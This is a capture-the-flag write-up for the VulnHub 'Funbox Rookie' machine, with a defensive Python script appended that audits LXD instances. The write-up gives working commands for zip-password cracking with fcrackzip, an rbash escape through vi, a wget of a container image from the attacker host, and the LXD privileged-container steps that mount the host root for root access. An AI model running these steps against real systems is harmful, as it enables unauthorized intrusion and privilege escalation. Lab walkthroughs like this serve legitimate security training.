Target description
Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first.
This VM is created/tested with Virtualbox. Maybe it works with vmware.
If you need hints, call me on twitter: @0815R2d2
Have fun...
This works better with VirtualBox, rather than VMware
Download: https://www.vulnhub.com/entry/funbox-rookie,520/
Checklist
- Information gathering
  - netdiscover
  - fcrackzip
- Privilege escalation
  - lxd
Information gathering
Target IP
Port scan
nmap -A 192.168.34.172
21/tcp open ftp ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 anna.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 ariel.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:52 bud.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:58 cathrine.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 homer.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 jessica.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 john.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 marge.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 miriam.zip
| -r--r--r-- 1 ftp ftp 1477 Jul 25 10:44 tom.zip
| -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
|_-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 zlatan.zip
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
| 256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_ 256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/logs/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
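Ports 21, 22, and 80 are open
21
Many files
80
Apache default page
21
Download the files from the FTP server
The archives are password-protected
The content is id_rsa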
fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt cathrine.zip
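This yields the archive password
User tom
Connect as the tom user
Exploitation
The vulnerability has now been identified [^1]
Changing to /tmp fails with an rbash (restricted shell) message
Bypass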
vi
:set shell=/bin/bash
:shell
Changing directories now works
Kali
Use Python to transfer the file to the target
Target
Change to /tmp
wget http://192.168.34.160:8000/alpine-v3.12-x86_64-20200804_1103.tar.gz
// download
lxc image import alpine-v3.12-x86_64-20200804_1103.tar.gz --alias y2my
// import
lxd init
// initialize
lxc init y2my privesc -c security.privileged=true
lxc config device add privesc y2my disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
Enter the commands above in order
Root obtained
Read the contents of the flag file
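From the defender's side, the escalation above depends on an instance created with security.privileged=true plus a disk device whose source is the host's /. The following is an added example, not part of the original write-up: it audits instance definitions for those two settings, assuming input shaped like `lxc list --format json`; the sample instances, the SENSITIVE path list and the function names are constructed for illustration.

```python
import json

# Constructed sample shaped like `lxc list --format json` output (field names assumed).
SAMPLE = json.dumps([
    {"name": "privesc", "expanded_config": {"security.privileged": "true"},
     "expanded_devices": {
         "y2my": {"type": "disk", "source": "/", "path": "/mnt/root"},
         "root": {"type": "disk", "pool": "default", "path": "/"}}},
    {"name": "web01", "expanded_config": {"security.privileged": "false"},
     "expanded_devices": {
         "root": {"type": "disk", "pool": "default", "path": "/"},
         "data": {"type": "disk", "source": "/srv/web", "path": "/data"}}},
    {"name": "build", "expanded_config": {},
     "expanded_devices": {"etc": {"type": "disk", "source": "/etc/", "path": "/host-etc"}}},
])

# Host paths that should not be bind-mounted into a container (hypothetical policy).
SENSITIVE = ("/etc", "/root", "/home", "/var")


def host_mounts(devices):
    """Return (device, source) pairs for disks that bind-mount a sensitive host path."""
    hits = []
    for name, dev in devices.items():
        src = dev.get("source")
        # Pool-backed disks reference a storage volume, not a host path.
        if dev.get("type") != "disk" or not src or "pool" in dev:
            continue
        norm = "/" + src.strip("/")
        if norm == "/" or any(norm == s or norm.startswith(s + "/") for s in SENSITIVE):
            hits.append((name, src))
    return hits


def audit(instances_json):
    """Map instance name -> findings for privileged mode and host bind mounts."""
    report = {}
    for inst in json.loads(instances_json):
        cfg = inst.get("expanded_config") or inst.get("config") or {}
        devs = inst.get("expanded_devices") or inst.get("devices") or {}
        priv = str(cfg.get("security.privileged")).lower() in ("true", "1", "yes", "on")
        found = (["privileged"] if priv else []) + [
            f"host-mount:{n}={s}" for n, s in host_mounts(devs)]
        if found:
            report[inst["name"]] = found
    return report


if __name__ == "__main__":
    print(audit(SAMPLE))
```

Any instance reported with both findings gives root inside the container direct write access to the host filesystem. Membership of the lxd group should be reviewed alongside the report, since its members can create such instances.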